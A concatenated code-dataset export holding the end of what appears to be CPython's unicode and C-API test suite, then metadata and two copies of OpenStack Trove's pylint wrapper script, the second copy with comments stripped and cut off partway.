ascii, ascii2,
latin, latin2,
bmp, bmp2,
astral, astral2)
for text1, text2 in itertools.combinations(strings, 2):
equal = (text1 is text2)
self.assertEqual(text1 == text2, equal)
self.assertEqual(text1 != text2, not equal)
if equal:
self.assertTrue(text1 <= text2)
self.assertTrue(text1 >= text2)
# text1 is text2: duplicate strings to skip the "str1 == str2"
# optimization in unicode_compare_eq() and really compare
# character per character
copy1 = duplicate_string(text1)
copy2 = duplicate_string(text2)
self.assertIsNot(copy1, copy2)
self.assertTrue(copy1 == copy2)
self.assertFalse(copy1 != copy2)
self.assertTrue(copy1 <= copy2)
self.assertTrue(copy2 >= copy2)
self.assertTrue(ascii < ascii2)
self.assertTrue(ascii < latin)
self.assertTrue(ascii < bmp)
self.assertTrue(ascii < astral)
self.assertFalse(ascii >= ascii2)
self.assertFalse(ascii >= latin)
self.assertFalse(ascii >= bmp)
self.assertFalse(ascii >= astral)
self.assertFalse(latin < ascii)
self.assertTrue(latin < latin2)
self.assertTrue(latin < bmp)
self.assertTrue(latin < astral)
self.assertTrue(latin >= ascii)
self.assertFalse(latin >= latin2)
self.assertFalse(latin >= bmp)
self.assertFalse(latin >= astral)
self.assertFalse(bmp < ascii)
self.assertFalse(bmp < latin)
self.assertTrue(bmp < bmp2)
self.assertTrue(bmp < astral)
self.assertTrue(bmp >= ascii)
self.assertTrue(bmp >= latin)
self.assertFalse(bmp >= bmp2)
self.assertFalse(bmp >= astral)
self.assertFalse(astral < ascii)
self.assertFalse(astral < latin)
self.assertFalse(astral < bmp2)
self.assertTrue(astral < astral2)
self.assertTrue(astral >= ascii)
self.assertTrue(astral >= latin)
self.assertTrue(astral >= bmp2)
self.assertFalse(astral >= astral2)
def test_free_after_iterating(self):
support.check_free_after_iterating(self, iter, str)
support.check_free_after_iterating(self, reversed, str)
class CAPITest(unittest.TestCase):
# Test PyUnicode_FromFormat()
def test_from_format(self):
support.import_module('ctypes')
from ctypes import (
pythonapi, py_object, sizeof,
c_int, c_long, c_longlong, c_ssize_t,
c_uint, c_ulong, c_ulonglong, c_size_t, c_void_p)
name = "PyUnicode_FromFormat"
_PyUnicode_FromFormat = getattr(pythonapi, name)
_PyUnicode_FromFormat.restype = py_object
def PyUnicode_FromFormat(format, *args):
cargs = tuple(
py_object(arg) if isinstance(arg, str) else arg
for arg in args)
return _PyUnicode_FromFormat(format, *cargs)
def check_format(expected, format, *args):
text = PyUnicode_FromFormat(format, *args)
self.assertEqual(expected, text)
# ascii format, non-ascii argument
check_format('ascii\x7f=unicode\xe9',
b'ascii\x7f=%U', 'unicode\xe9')
# non-ascii format, ascii argument: ensure that PyUnicode_FromFormatV()
# raises an error
self.assertRaisesRegex(ValueError,
r'^PyUnicode_FromFormatV\(\) expects an ASCII-encoded format '
'string, got a non-ASCII byte: 0xe9$',
PyUnicode_FromFormat, b'unicode\xe9=%s', 'ascii')
# test "%c"
check_format('\uabcd',
b'%c', c_int(0xabcd))
check_format('\U0010ffff',
b'%c', c_int(0x10ffff))
with self.assertRaises(OverflowError):
PyUnicode_FromFormat(b'%c', c_int(0x110000))
# Issue #18183
check_format('\U00010000\U00100000',
b'%c%c', c_int(0x10000), c_int(0x100000))
# test "%"
check_format('%',
b'%')
check_format('%',
b'%%')
check_format('%s',
b'%%s')
check_format('[%]',
b'[%%]')
check_format('%abc',
b'%%%s', b'abc')
# truncated string
check_format('abc',
b'%.3s', b'abcdef')
check_format('abc[\ufffd',
b'%.5s', 'abc[\u20ac]'.encode('utf8'))
check_format("'\\u20acABC'",
b'%A', '\u20acABC')
check_format("'\\u20",
b'%.5A', '\u20acABCDEF')
check_format("'\u20acABC'",
b'%R', '\u20acABC')
check_format("'\u20acA",
b'%.3R', '\u20acABCDEF')
check_format('\u20acAB',
b'%.3S', '\u20acABCDEF')
check_format('\u20acAB',
b'%.3U', '\u20acABCDEF')
check_format('\u20acAB',
b'%.3V', '\u20acABCDEF', None)
check_format('abc[\ufffd',
b'%.5V', None, 'abc[\u20ac]'.encode('utf8'))
# following tests comes from #7330
# test width modifier and precision modifier with %S
check_format("repr= abc",
b'repr=%5S', 'abc')
check_format("repr=ab",
b'repr=%.2S', 'abc')
check_format("repr= ab",
b'repr=%5.2S', 'abc')
# test width modifier and precision modifier with %R
check_format("repr= 'abc'",
b'repr=%8R', 'abc')
check_format("repr='ab",
b'repr=%.3R', 'abc')
check_format("repr= 'ab",
b'repr=%5.3R', 'abc')
# test width modifier and precision modifier with %A
check_format("repr= 'abc'",
b'repr=%8A', 'abc')
check_format("repr='ab",
b'repr=%.3A', 'abc')
check_format("repr= 'ab",
b'repr=%5.3A', 'abc')
# test width modifier and precision modifier with %s
check_format("repr= abc",
b'repr=%5s', b'abc')
check_format("repr=ab",
b'repr=%.2s', b'abc')
check_format("repr= ab",
b'repr=%5.2s', b'abc')
# test width modifier and precision modifier with %U
check_format("repr= abc",
b'repr=%5U', 'abc')
check_format("repr=ab",
b'repr=%.2U', 'abc')
check_format("repr= ab",
b'repr=%5.2U', 'abc')
# test width modifier and precision modifier with %V
check_format("repr= abc",
b'repr=%5V', 'abc', b'123')
check_format("repr=ab",
b'repr=%.2V', 'abc', b'123')
check_format("repr= ab",
b'repr=%5.2V', 'abc', b'123')
check_format("repr= 123",
b'repr=%5V', None, b'123')
check_format("repr=12",
b'repr=%.2V', None, b'123')
check_format("repr= 12",
b'repr=%5.2V', None, b'123')
# test integer formats (%i, %d, %u)
check_format('010',
b'%03i', c_int(10))
check_format('0010',
b'%0.4i', c_int(10))
check_format('-123',
b'%i', c_int(-123))
check_format('-123',
b'%li', c_long(-123))
check_format('-123',
b'%lli', c_longlong(-123))
check_format('-123',
b'%zi', c_ssize_t(-123))
check_format('-123',
b'%d', c_int(-123))
check_format('-123',
b'%ld', c_long(-123))
check_format('-123',
b'%lld', c_longlong(-123))
check_format('-123',
b'%zd', c_ssize_t(-123))
check_format('123',
b'%u', c_uint(123))
check_format('123',
b'%lu', c_ulong(123))
check_format('123',
b'%llu', c_ulonglong(123))
check_format('123',
b'%zu', c_size_t(123))
# test long output
min_longlong = -(2 ** (8 * sizeof(c_longlong) - 1))
max_longlong = -min_longlong - 1
check_format(str(min_longlong),
b'%lld', c_longlong(min_longlong))
check_format(str(max_longlong),
b'%lld', c_longlong(max_longlong))
max_ulonglong = 2 ** (8 * sizeof(c_ulonglong)) - 1
check_format(str(max_ulonglong),
b'%llu', c_ulonglong(max_ulonglong))
PyUnicode_FromFormat(b'%p', c_void_p(-1))
# test padding (width and/or precision)
check_format('123'.rjust(10, '0'),
b'%010i', c_int(123))
check_format('123'.rjust(100),
b'%100i', c_int(123))
check_format('123'.rjust(100, '0'),
b'%.100i', c_int(123))
check_format('123'.rjust(80, '0').rjust(100),
b'%100.80i', c_int(123))
check_format('123'.rjust(10, '0'),
b'%010u', c_uint(123))
check_format('123'.rjust(100),
b'%100u', c_uint(123))
check_format('123'.rjust(100, '0'),
b'%.100u', c_uint(123))
check_format('123'.rjust(80, '0').rjust(100),
b'%100.80u', c_uint(123))
check_format('123'.rjust(10, '0'),
b'%010x', c_int(0x123))
check_format('123'.rjust(100),
b'%100x', c_int(0x123))
check_format('123'.rjust(100, '0'),
b'%.100x', c_int(0x123))
check_format('123'.rjust(80, '0').rjust(100),
b'%100.80x', c_int(0x123))
# test %A
check_format(r"%A:'abc\xe9\uabcd\U0010ffff'",
b'%%A:%A', 'abc\xe9\uabcd\U0010ffff')
# test %V
check_format('repr=abc',
b'repr=%V', 'abc', b'xyz')
# Test string decode from parameter of %s using utf-8.
# b'\xe4\xba\xba\xe6\xb0\x91' is utf-8 encoded byte sequence of
# '\u4eba\u6c11'
check_format('repr=\u4eba\u6c11',
b'repr=%V', None, b'\xe4\xba\xba\xe6\xb0\x91')
#Test replace error handler.
check_format('repr=abc\ufffd',
b'repr=%V', None, b'abc\xff')
# not supported: copy the raw format string. these tests are just here
# to check for crashes and should not be considered as specifications
check_format('%s',
b'%1%s', b'abc')
check_format('%1abc',
b'%1abc')
check_format('%+i',
b'%+i', c_int(10))
check_format('%.%s',
b'%.%s', b'abc')
# Test PyUnicode_AsWideChar()
@support.cpython_only
def test_aswidechar(self):
from _testcapi import unicode_aswidechar
support.import_module('ctypes')
from ctypes import c_wchar, sizeof
wchar, size = unicode_aswidechar('abcdef', 2)
self.assertEqual(size, 2)
self.assertEqual(wchar, 'ab')
wchar, size = unicode_aswidechar('abc', 3)
self.assertEqual(size, 3)
self.assertEqual(wchar, 'abc')
wchar, size = unicode_aswidechar('abc', 4)
self.assertEqual(size, 3)
self.assertEqual(wchar, 'abc\0')
wchar, size = unicode_aswidechar('abc', 10)
self.assertEqual(size, 3)
self.assertEqual(wchar, 'abc\0')
wchar, size = unicode_aswidechar('abc\0def', 20)
self.assertEqual(size, 7)
self.assertEqual(wchar, 'abc\0def\0')
nonbmp = chr(0x10ffff)
if sizeof(c_wchar) == 2:
buflen = 3
nchar = 2
else: # sizeof(c_wchar) == 4
buflen = 2
nchar = 1
wchar, size = unicode_aswidechar(nonbmp, buflen)
self.assertEqual(size, nchar)
self.assertEqual(wchar, nonbmp + '\0')
# Test PyUnicode_AsWideCharString()
@support.cpython_only
def test_aswidecharstring(self):
from _testcapi import unicode_aswidecharstring
support.import_module('ctypes')
from ctypes import c_wchar, sizeof
wchar, size = unicode_aswidecharstring('abc')
self.assertEqual(size, 3)
self.assertEqual(wchar, 'abc\0')
wchar, size = unicode_aswidecharstring('abc\0def')
self.assertEqual(size, 7)
self.assertEqual(wchar, 'abc\0def\0')
nonbmp = chr(0x10ffff)
if sizeof(c_wchar) == 2:
nchar = 2
else: # sizeof(c_wchar) == 4
nchar = 1
wchar, size = unicode_aswidecharstring(nonbmp)
self.assertEqual(size, nchar)
self.assertEqual(wchar, nonbmp + '\0')
# Test PyUnicode_AsUCS4()
@support.cpython_only
def test_asucs4(self):
from _testcapi import unicode_asucs4
for s in ['abc', '\xa1\xa2', '\u4f60\u597d', 'a\U0001f600',
'a\ud800b\udfffc', '\ud834\udd1e']:
l = len(s)
self.assertEqual(unicode_asucs4(s, l, 1), s+'\0')
self.assertEqual(unicode_asucs4(s, l, 0), s+'\uffff')
self.assertEqual(unicode_asucs4(s, l+1, 1), s+'\0\uffff')
self.assertEqual(unicode_asucs4(s, l+1, 0), s+'\0\uffff')
self.assertRaises(SystemError, unicode_asucs4, s, l-1, 1)
self.assertRaises(SystemError, unicode_asucs4, s, l-2, 0)
s = '\0'.join([s, s])
self.assertEqual(unicode_asucs4(s, len(s), 1), s+'\0')
self.assertEqual(unicode_asucs4(s, len(s), 0), s+'\uffff')
# Test PyUnicode_FindChar()
@support.cpython_only
def test_findchar(self):
from _testcapi import unicode_findchar
for str in "\xa1", "\u8000\u8080", "\ud800\udc02", "\U0001f100\U0001f1f1":
for i, ch in enumerate(str):
self.assertEqual(unicode_findchar(str, ord(ch), 0, len(str), 1), i)
self.assertEqual(unicode_findchar(str, ord(ch), 0, len(str), -1), i)
str = "!>_<!"
self.assertEqual(unicode_findchar(str, 0x110000, 0, len(str), 1), -1)
self.assertEqual(unicode_findchar(str, 0x110000, 0, len(str), -1), -1)
# start < end
self.assertEqual(unicode_findchar(str, ord('!'), 1, len(str)+1, 1), 4)
self.assertEqual(unicode_findchar(str, ord('!'), 1, len(str)+1, -1), 4)
# start >= end
self.assertEqual(unicode_findchar(str, ord('!'), 0, 0, 1), -1)
self.assertEqual(unicode_findchar(str, ord('!'), len(str), 0, 1), -1)
# negative
self.assertEqual(unicode_findchar(str, ord('!'), -len(str), -1, 1), 0)
self.assertEqual(unicode_findchar(str, ord('!'), -len(str), -1, -1), 0)
# Test PyUnicode_CopyCharacters()
@support.cpython_only
def test_copycharacters(self):
from _testcapi import unicode_copycharacters
strings = [
'abcde', '\xa1\xa2\xa3\xa4\xa5',
'\u4f60\u597d\u4e16\u754c\uff01',
'\U0001f600\U0001f601\U0001f602\U0001f603\U0001f604'
]
for idx, from_ in enumerate(strings):
# wide -> narrow: exceed maxchar limitation
for to in strings[:idx]:
self.assertRaises(
SystemError,
unicode_copycharacters, to, 0, from_, 0, 5
)
# same kind
for from_start in range(5):
self.assertEqual(
unicode_copycharacters(from_, 0, from_, from_start, 5),
(from_[from_start:from_start+5].ljust(5, '\0'),
5-from_start)
)
for to_start in range(5):
self.assertEqual(
unicode_copycharacters(from_, to_start, from_, to_start, 5),
(from_[to_start:to_start+5].rjust(5, '\0'),
5-to_start)
)
# narrow -> wide
# Tests omitted since this creates invalid strings.
s = strings[0]
self.assertRaises(IndexError, unicode_copycharacters, s, 6, s, 0, 5)
self.assertRaises(IndexError, unicode_copycharacters, s, -1, s, 0, 5)
self.assertRaises(IndexError, unicode_copycharacters, s, 0, s, 6, 5)
self.assertRaises(IndexError, unicode_copycharacters, s, 0, s, -1, 5)
self.assertRaises(SystemError, unicode_copycharacters, s, 1, s, 0, 5)
self.assertRaises(SystemError, unicode_copycharacters, s, 0, s, 0, -1)
self.assertRaises(SystemError, unicode_copycharacters, s, 0, b'', 0, 0)
@support.cpython_only
def test_encode_decimal(self):
from _testcapi import unicode_encodedecimal
self.assertEqual(unicode_encodedecimal('123'),
b'123')
self.assertEqual(unicode_encodedecimal('\u0663.\u0661\u0664'),
b'3.14')
self.assertEqual(unicode_encodedecimal("\N{EM SPACE}3.14\N{EN SPACE}"),
b' 3.14 ')
self.assertRaises(UnicodeEncodeError,
unicode_encodedecimal, "123\u20ac", "strict")
self.assertRaisesRegex(
ValueError,
"^'decimal' codec can't encode character",
unicode_encodedecimal, "123\u20ac", "replace")
@support.cpython_only
def test_transform_decimal(self):
from _testcapi import unicode_transformdecimaltoascii as transform_decimal
self.assertEqual(transform_decimal('123'),
'123')
self.assertEqual(transform_decimal('\u0663.\u0661\u0664'),
'3.14')
self.assertEqual(transform_decimal("\N{EM SPACE}3.14\N{EN SPACE}"),
"\N{EM SPACE}3.14\N{EN SPACE}")
self.assertEqual(transform_decimal('123\u20ac'),
'123\u20ac')
@support.cpython_only
def test_pep393_utf8_caching_bug(self):
# Issue #25709: Problem with string concatenation and utf-8 cache
from _testcapi import getargs_s_hash
for k in 0x24, 0xa4, 0x20ac, 0x1f40d:
s = ''
for i in range(5):
# Due to CPython specific optimization the 's' string can be
# resized in-place.
s += chr(k)
# Parsing with the "s#" format code calls indirectly
# PyUnicode_AsUTF8AndSize() which creates the UTF-8
# encoded string cached in the Unicode object.
self.assertEqual(getargs_s_hash(s), chr(k).encode() * (i + 1))
# Check that the second call returns the same result
self.assertEqual(getargs_s_hash(s), chr(k).encode() * (i + 1))
class StringModuleTest(unittest.TestCase):
def test_formatter_parser(self):
def parse(format):
return list(_string.formatter_parser(format))
formatter = parse("prefix {2!s}xxx{0:^+10.3f}{obj.attr!s} {z[0]!s:10}")
self.assertEqual(formatter, [
('prefix ', '2', '', 's'),
('xxx', '0', '^+10.3f', None),
('', 'obj.attr', '', 's'),
(' ', 'z[0]', '10', 's'),
])
formatter = parse("prefix {} suffix")
self.assertEqual(formatter, [
('prefix ', '', '', None),
(' suffix', None, None, None),
])
formatter = parse("str")
self.assertEqual(formatter, [
('str', None, None, None),
])
formatter = parse("")
self.assertEqual(formatter, [])
formatter = parse("{0}")
self.assertEqual(formatter, [
('', '0', '', None),
])
self.assertRaises(TypeError, _string.formatter_parser, 1)
def test_formatter_field_name_split(self):
def split(name):
items = list(_string.formatter_field_name_split(name))
items[1] = list(items[1])
return items
self.assertEqual(split("obj"), ["obj", []])
self.assertEqual(split("obj.arg"), ["obj", [(True, 'arg')]])
self.assertEqual(split("obj[key]"), ["obj", [(False, 'key')]])
self.assertEqual(split("obj.arg[key1][key2]"), [
"obj",
[(True, 'arg'),
(False, 'key1'),
(False, 'key2'),
]])
self.assertRaises(TypeError, _string.formatter_field_name_split, 1)
if __name__ == "__main__":
unittest.main()
| true
| true
|
f705051db073657252741e08c08f2ef3c4cd9b70
| 11,317
|
py
|
Python
|
tools/trove-pylint.py
|
a4913994/openstack_trove
|
3b550048dd1e5841ad0f3295679e0f0b913a5687
|
[
"Apache-2.0"
] | 244
|
2015-01-01T12:04:44.000Z
|
2022-03-25T23:38:39.000Z
|
tools/trove-pylint.py
|
a4913994/openstack_trove
|
3b550048dd1e5841ad0f3295679e0f0b913a5687
|
[
"Apache-2.0"
] | 6
|
2015-08-18T08:19:10.000Z
|
2022-03-05T02:32:36.000Z
|
tools/trove-pylint.py
|
a4913994/openstack_trove
|
3b550048dd1e5841ad0f3295679e0f0b913a5687
|
[
"Apache-2.0"
] | 178
|
2015-01-02T15:16:58.000Z
|
2022-03-23T03:30:20.000Z
|
#!/usr/bin/env python
# Copyright 2016 Tesora, Inc.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fnmatch
import json
from collections import OrderedDict
import io
import os
import re
import sys
from pylint import lint
from pylint.reporters import text
DEFAULT_CONFIG_FILE = "tools/trove-pylint.config"
DEFAULT_IGNORED_FILES = ['trove/tests']
DEFAULT_IGNORED_CODES = []
DEFAULT_IGNORED_MESSAGES = []
DEFAULT_ALWAYS_ERROR = [
"Undefined variable '_'",
"Undefined variable '_LE'",
"Undefined variable '_LI'",
"Undefined variable '_LW'",
"Undefined variable '_LC'"]
MODE_CHECK = "check"
MODE_REBUILD = "rebuild"
class Config(object):
def __init__(self, filename=DEFAULT_CONFIG_FILE):
self.default_config = {
"include": ["*.py"],
"folder": "trove",
"options": ["--rcfile=./pylintrc", "-E"],
"ignored_files": DEFAULT_IGNORED_FILES,
"ignored_codes": DEFAULT_IGNORED_CODES,
"ignored_messages": DEFAULT_IGNORED_MESSAGES,
"ignored_file_codes": [],
"ignored_file_messages": [],
"ignored_file_code_messages": [],
"always_error_messages": DEFAULT_ALWAYS_ERROR
}
self.config = self.default_config
def sort_config(self):
sorted_config = OrderedDict()
for key in sorted(self.config.keys()):
value = self.get(key)
if isinstance(value, list) and not isinstance(value,str):
sorted_config[key] = sorted(value)
else:
sorted_config[key] = value
return sorted_config
def save(self, filename=DEFAULT_CONFIG_FILE):
if os.path.isfile(filename):
os.rename(filename, "%s~" % filename)
with open(filename, 'w') as fp:
json.dump(self.sort_config(), fp, encoding="utf-8",
indent=2, separators=(',', ': '))
def load(self, filename=DEFAULT_CONFIG_FILE):
with open(filename) as fp:
self.config = json.load(fp, encoding="utf-8")
def get(self, attribute):
return self.config[attribute]
def is_file_ignored(self, f):
if any(f.startswith(i)
for i in self.config['ignored_files']):
return True
return False
def is_file_included(self, f):
if any(fnmatch.fnmatch(f, wc) for wc in self.config['include']):
return True
return False
def is_always_error(self, message):
if message in self.config['always_error_messages']:
return True
return False
def ignore(self, filename, code, codename, message):
# the high priority checks
if self.is_file_ignored(filename):
return True
# never ignore messages
if self.is_always_error(message):
return False
if code in self.config['ignored_codes']:
return True
if codename in self.config['ignored_codes']:
return True
if message and any(message.startswith(ignore_message)
for ignore_message
in self.config['ignored_messages']):
return True
if filename and message and (
[filename, message] in self.config['ignored_file_messages']):
return True
if filename and code and (
[filename, code] in self.config['ignored_file_codes']):
return True
if filename and codename and (
[filename, codename] in self.config['ignored_file_codes']):
return True
for fcm in self.config['ignored_file_code_messages']:
if filename != fcm[0]:
# This ignore rule is for a different file.
continue
if fcm[1] not in (code, codename):
# This ignore rule is for a different code or codename.
continue
if message.startswith(fcm[2]):
return True
return False
def ignore_code(self, c):
_c = set(self.config['ignored_codes'])
_c.add(c)
self.config['ignored_codes'] = list(_c)
def ignore_files(self, f):
_c = set(self.config['ignored_files'])
_c.add(f)
self.config['ignored_files'] = list(_c)
def ignore_message(self, m):
_c = set(self.config['ignored_messages'])
_c.add(m)
self.config['ignored_messages'] = list(_c)
def ignore_file_code(self, f, c):
_c = set(self.config['ignored_file_codes'])
_c.add((f, c))
self.config['ignored_file_codes'] = list(_c)
def ignore_file_message(self, f, m):
_c = set(self.config['ignored_file_messages'])
_c.add((f, m))
self.config['ignored_file_messages'] = list(_c)
def ignore_file_code_message(self, f, c, m, fn):
_c = set(self.config['ignored_file_code_messages'])
_c.add((f, c, m, fn))
self.config['ignored_file_code_messages'] = list(_c)
def main():
if len(sys.argv) == 1 or sys.argv[1] == "check":
return check()
elif sys.argv[1] == "rebuild":
return rebuild()
elif sys.argv[1] == "initialize":
return initialize()
else:
return usage()
def usage():
print("Usage: %s [check|rebuild]" % sys.argv[0])
print("\tUse this tool to perform a lint check of the trove project.")
print("\t check: perform the lint check.")
print("\t rebuild: rebuild the list of exceptions to ignore.")
return 0
class ParseableTextReporter(text.TextReporter):
name = 'parseable'
line_format = '{path}:{line}: [{msg_id}({symbol}), {obj}] {msg}'
# that's it folks
class LintRunner(object):
def __init__(self):
self.config = Config()
self.idline = re.compile("^[*]* Module .*")
self.detail = re.compile(r"(\S+):(\d+): \[(\S+)\((\S+)\),"
r" (\S+)?] (.*)")
def dolint(self, filename):
exceptions = set()
buffer = io.StringIO()
reporter = ParseableTextReporter(output=buffer)
options = list(self.config.get('options'))
options.append(filename)
lint.Run(options, reporter=reporter, exit=False)
output = buffer.getvalue()
buffer.close()
for line in output.splitlines():
if self.idline.match(line):
continue
if self.detail.match(line):
mo = self.detail.search(line)
tokens = mo.groups()
fn = tokens[0]
ln = tokens[1]
code = tokens[2]
codename = tokens[3]
func = tokens[4]
message = tokens[5]
if not self.config.ignore(fn, code, codename, message):
exceptions.add((fn, ln, code, codename, func, message))
return exceptions
def process(self, mode=MODE_CHECK):
files_processed = 0
files_with_errors = 0
errors_recorded = 0
exceptions_recorded = 0
all_exceptions = []
for (root, dirs, files) in os.walk(self.config.get('folder')):
# if we shouldn't even bother about this part of the
# directory structure, we can punt quietly
if self.config.is_file_ignored(root):
continue
# since we are walking top down, let's clean up the dirs
# that we will walk by eliminating any dirs that will
# end up getting ignored
for d in dirs:
p = os.path.join(root, d)
if self.config.is_file_ignored(p):
dirs.remove(d)
# check if we can ignore the file and process if not
for f in files:
p = os.path.join(root, f)
if self.config.is_file_ignored(p):
continue
if not self.config.is_file_included(f):
continue
files_processed += 1
exceptions = self.dolint(p)
file_had_errors = 0
for e in exceptions:
# what we do with this exception depents on the
# kind of exception, and the mode
if self.config.is_always_error(e[5]):
all_exceptions.append(e)
errors_recorded += 1
file_had_errors += 1
elif mode == MODE_REBUILD:
# parameters to ignore_file_code_message are
# filename, code, message and function
self.config.ignore_file_code_message(e[0], e[2], e[-1], e[4])
self.config.ignore_file_code_message(e[0], e[3], e[-1], e[4])
exceptions_recorded += 1
elif mode == MODE_CHECK:
all_exceptions.append(e)
errors_recorded += 1
file_had_errors += 1
if file_had_errors:
files_with_errors += 1
for e in sorted(all_exceptions):
print("ERROR: %s %s: %s %s, %s: %s" %
(e[0], e[1], e[2], e[3], e[4], e[5]))
return (files_processed, files_with_errors, errors_recorded,
exceptions_recorded)
def rebuild(self):
self.initialize()
(files_processed,
files_with_errors,
errors_recorded,
exceptions_recorded) = self.process(mode=MODE_REBUILD)
if files_with_errors > 0:
print("Rebuild failed. %s files processed, %s had errors, "
"%s errors recorded." % (
files_processed, files_with_errors, errors_recorded))
return 1
self.config.save()
print("Rebuild completed. %s files processed, %s exceptions recorded." %
(files_processed, exceptions_recorded))
return 0
def check(self):
self.config.load()
(files_processed,
files_with_errors,
errors_recorded,
exceptions_recorded) = self.process(mode=MODE_CHECK)
if files_with_errors > 0:
print("Check failed. %s files processed, %s had errors, "
"%s errors recorded." % (
files_processed, files_with_errors, errors_recorded))
return 1
print("Check succeeded. %s files processed" % files_processed)
return 0
def initialize(self):
self.config.save()
return 0
def check():
exit(LintRunner().check())
def rebuild():
exit(LintRunner().rebuild())
def initialize():
exit(LintRunner().initialize())
if __name__ == "__main__":
main()
| 32.242165
| 85
| 0.567111
|
import fnmatch
import json
from collections import OrderedDict
import io
import os
import re
import sys
from pylint import lint
from pylint.reporters import text
DEFAULT_CONFIG_FILE = "tools/trove-pylint.config"
DEFAULT_IGNORED_FILES = ['trove/tests']
DEFAULT_IGNORED_CODES = []
DEFAULT_IGNORED_MESSAGES = []
DEFAULT_ALWAYS_ERROR = [
"Undefined variable '_'",
"Undefined variable '_LE'",
"Undefined variable '_LI'",
"Undefined variable '_LW'",
"Undefined variable '_LC'"]
MODE_CHECK = "check"
MODE_REBUILD = "rebuild"
class Config(object):
def __init__(self, filename=DEFAULT_CONFIG_FILE):
self.default_config = {
"include": ["*.py"],
"folder": "trove",
"options": ["--rcfile=./pylintrc", "-E"],
"ignored_files": DEFAULT_IGNORED_FILES,
"ignored_codes": DEFAULT_IGNORED_CODES,
"ignored_messages": DEFAULT_IGNORED_MESSAGES,
"ignored_file_codes": [],
"ignored_file_messages": [],
"ignored_file_code_messages": [],
"always_error_messages": DEFAULT_ALWAYS_ERROR
}
self.config = self.default_config
def sort_config(self):
sorted_config = OrderedDict()
for key in sorted(self.config.keys()):
value = self.get(key)
if isinstance(value, list) and not isinstance(value,str):
sorted_config[key] = sorted(value)
else:
sorted_config[key] = value
return sorted_config
def save(self, filename=DEFAULT_CONFIG_FILE):
if os.path.isfile(filename):
os.rename(filename, "%s~" % filename)
with open(filename, 'w') as fp:
json.dump(self.sort_config(), fp, encoding="utf-8",
indent=2, separators=(',', ': '))
def load(self, filename=DEFAULT_CONFIG_FILE):
with open(filename) as fp:
self.config = json.load(fp, encoding="utf-8")
def get(self, attribute):
return self.config[attribute]
def is_file_ignored(self, f):
if any(f.startswith(i)
for i in self.config['ignored_files']):
return True
return False
def is_file_included(self, f):
if any(fnmatch.fnmatch(f, wc) for wc in self.config['include']):
return True
return False
def is_always_error(self, message):
if message in self.config['always_error_messages']:
return True
return False
def ignore(self, filename, code, codename, message):
if self.is_file_ignored(filename):
return True
if self.is_always_error(message):
return False
if code in self.config['ignored_codes']:
return True
if codename in self.config['ignored_codes']:
return True
if message and any(message.startswith(ignore_message)
for ignore_message
in self.config['ignored_messages']):
return True
if filename and message and (
[filename, message] in self.config['ignored_file_messages']):
return True
if filename and code and (
[filename, code] in self.config['ignored_file_codes']):
return True
if filename and codename and (
[filename, codename] in self.config['ignored_file_codes']):
return True
for fcm in self.config['ignored_file_code_messages']:
if filename != fcm[0]:
continue
if fcm[1] not in (code, codename):
continue
if message.startswith(fcm[2]):
return True
return False
def ignore_code(self, c):
_c = set(self.config['ignored_codes'])
_c.add(c)
self.config['ignored_codes'] = list(_c)
def ignore_files(self, f):
_c = set(self.config['ignored_files'])
_c.add(f)
self.config['ignored_files'] = list(_c)
def ignore_message(self, m):
_c = set(self.config['ignored_messages'])
_c.add(m)
self.config['ignored_messages'] = list(_c)
def ignore_file_code(self, f, c):
_c = set(self.config['ignored_file_codes'])
_c.add((f, c))
self.config['ignored_file_codes'] = list(_c)
def ignore_file_message(self, f, m):
_c = set(self.config['ignored_file_messages'])
_c.add((f, m))
self.config['ignored_file_messages'] = list(_c)
def ignore_file_code_message(self, f, c, m, fn):
_c = set(self.config['ignored_file_code_messages'])
_c.add((f, c, m, fn))
self.config['ignored_file_code_messages'] = list(_c)
def main():
if len(sys.argv) == 1 or sys.argv[1] == "check":
return check()
elif sys.argv[1] == "rebuild":
return rebuild()
elif sys.argv[1] == "initialize":
return initialize()
else:
return usage()
def usage():
print("Usage: %s [check|rebuild]" % sys.argv[0])
print("\tUse this tool to perform a lint check of the trove project.")
print("\t check: perform the lint check.")
print("\t rebuild: rebuild the list of exceptions to ignore.")
return 0
class ParseableTextReporter(text.TextReporter):
name = 'parseable'
line_format = '{path}:{line}: [{msg_id}({symbol}), {obj}] {msg}'
class LintRunner(object):
def __init__(self):
self.config = Config()
self.idline = re.compile("^[*]* Module .*")
self.detail = re.compile(r"(\S+):(\d+): \[(\S+)\((\S+)\),"
r" (\S+)?] (.*)")
def dolint(self, filename):
exceptions = set()
buffer = io.StringIO()
reporter = ParseableTextReporter(output=buffer)
options = list(self.config.get('options'))
options.append(filename)
lint.Run(options, reporter=reporter, exit=False)
output = buffer.getvalue()
buffer.close()
for line in output.splitlines():
if self.idline.match(line):
continue
if self.detail.match(line):
mo = self.detail.search(line)
tokens = mo.groups()
fn = tokens[0]
ln = tokens[1]
code = tokens[2]
codename = tokens[3]
func = tokens[4]
message = tokens[5]
if not self.config.ignore(fn, code, codename, message):
exceptions.add((fn, ln, code, codename, func, message))
return exceptions
def process(self, mode=MODE_CHECK):
files_processed = 0
files_with_errors = 0
errors_recorded = 0
exceptions_recorded = 0
all_exceptions = []
for (root, dirs, files) in os.walk(self.config.get('folder')):
# if we shouldn't even bother about this part of the
if self.config.is_file_ignored(root):
continue
# that we will walk by eliminating any dirs that will
# end up getting ignored
for d in dirs:
p = os.path.join(root, d)
if self.config.is_file_ignored(p):
dirs.remove(d)
# check if we can ignore the file and process if not
for f in files:
p = os.path.join(root, f)
if self.config.is_file_ignored(p):
continue
if not self.config.is_file_included(f):
continue
files_processed += 1
exceptions = self.dolint(p)
file_had_errors = 0
for e in exceptions:
# what we do with this exception depents on the
# kind of exception, and the mode
if self.config.is_always_error(e[5]):
all_exceptions.append(e)
errors_recorded += 1
file_had_errors += 1
elif mode == MODE_REBUILD:
# parameters to ignore_file_code_message are
# filename, code, message and function
self.config.ignore_file_code_message(e[0], e[2], e[-1], e[4])
self.config.ignore_file_code_message(e[0], e[3], e[-1], e[4])
exceptions_recorded += 1
elif mode == MODE_CHECK:
all_exceptions.append(e)
errors_recorded += 1
file_had_errors += 1
if file_had_errors:
files_with_errors += 1
for e in sorted(all_exceptions):
